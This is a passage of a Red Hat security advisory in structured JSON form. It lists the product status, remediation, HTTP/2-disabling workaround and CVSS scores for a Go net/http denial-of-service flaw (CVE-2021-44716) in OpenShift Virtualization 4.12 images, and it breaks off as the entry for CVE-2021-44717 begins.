Virtualization, Red Hat Quay and OpenShift distributed tracing the most an attacker can possibly achieve by exploiting this vulnerability is to crash a container, temporarily impacting availability of one or more services. Therefore impact is rated Moderate.\n\nIn its default configuration, grafana as shipped in Red Hat Enterprise Linux 8 is not affected by this vulnerability. However, enabling http2 in /etc/grafana/grafana.ini explicitly would render grafana affected, therefore grafana has been marked affected.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44716", }, { category: "external", summary: "RHBZ#2030801", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030801", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44716", url: "https://www.cve.org/CVERecord?id=CVE-2021-44716", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "workaround", details: "This flaw can be mitigated by disabling HTTP/2. Setting the GODEBUG=http2server=0 environment variable before calling Serve will disable HTTP/2 unless it was manually configured through the golang.org/x/net/http2 package.", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http: limit growth of header canonicalization cache", }, { cve: "CVE-2021-44717", cwe: { id: "CWE-200", name: "Exposure of Sensitive Information to an Unauthorized Actor", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", 